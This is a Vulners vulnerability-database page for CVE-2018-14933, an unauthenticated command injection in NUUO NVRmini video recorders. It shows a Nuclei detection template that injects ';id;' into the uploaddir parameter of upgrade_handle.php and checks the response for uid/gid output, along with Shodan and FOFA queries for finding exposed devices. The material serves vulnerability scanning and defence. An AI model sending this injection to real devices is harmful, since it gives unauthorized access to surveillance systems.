Vulners
Lucene search
NUUO NVRmini - Remote Command Execution
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit | 7 Feb 201900:00 | – | zdt |
 | CVE-2018-14933 | 4 Aug 201800:00 | – | attackerkb |
 | CVE-2018-14933 | 7 Feb 201905:01 | – | circl |
 | NUUO NVRmini Devices OS Command Injection Vulnerability | 18 Dec 202400:00 | – | cisa_kev |
 | CISA Adds Four Known Exploited Vulnerabilities to Catalog | 18 Dec 202412:00 | – | cisa |
 | CVE-2018-14933 | 4 Aug 201819:00 | – | cve |
 | CVE-2018-14933 | 4 Aug 201819:00 | – | cvelist |
 | NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) | 11 Feb 201900:00 | – | exploitdb |
 | NUUO NVRmini upgrade_handle.php Remote Command Execution | 6 Dec 201802:51 | – | metasploit |
 | NUUO NVR Web Interface RCE | 18 Oct 201700:00 | – | nessus |
10
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/45070 |
| cve | www.cve.org/CVERecord |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2018-14933 |
id: CVE-2018-14933
info:
name: NUUO NVRmini - Remote Command Execution
author: ritikchaddha
severity: critical
description: |
NUUO NVRmini is vulnerable to unauthenticated remote command execution through the upgrade_handle.php file. The vulnerability allows an attacker to execute arbitrary commands by manipulating the uploaddir parameter.
impact: |
Unauthenticated attackers can execute arbitrary commands on the NUUO NVRmini device by manipulating the uploaddir parameter in upgrade_handle.php, leading to complete device compromise and potential unauthorized access to video surveillance systems and recordings.
remediation: |
Update NUUO NVRmini to a patched version later than the 2016 firmware that properly validates the uploaddir parameter and restricts command execution.
reference:
- https://www.exploit-db.com/exploits/45070
- https://www.cve.org/CVERecord?id=CVE-2018-14933
- https://nvd.nist.gov/vuln/detail/CVE-2018-14933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-14933
cwe-id: CWE-78
epss-score: 0.93746
epss-percentile: 0.9983
cpe: cpe:2.3:o:nuuo:nvrmini_firmware:2016:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: nuuo
product: nvrmini_firmware
shodan-query: title:"NUUO"
fofa-query: title="NUUO"
tags: cve,cve2018,nuuo,rce,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4a0a00473045022056b4567e4ccce94acae9837f8a82a0a7e0f6fd00151af99253e85ec850ea591b022100f5f0effa1caac16cfc3358d63df4fb992d51598de6d78e373f38fbade9ce6417:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.19.8
CVSS 210
EPSS0.93746
SSVC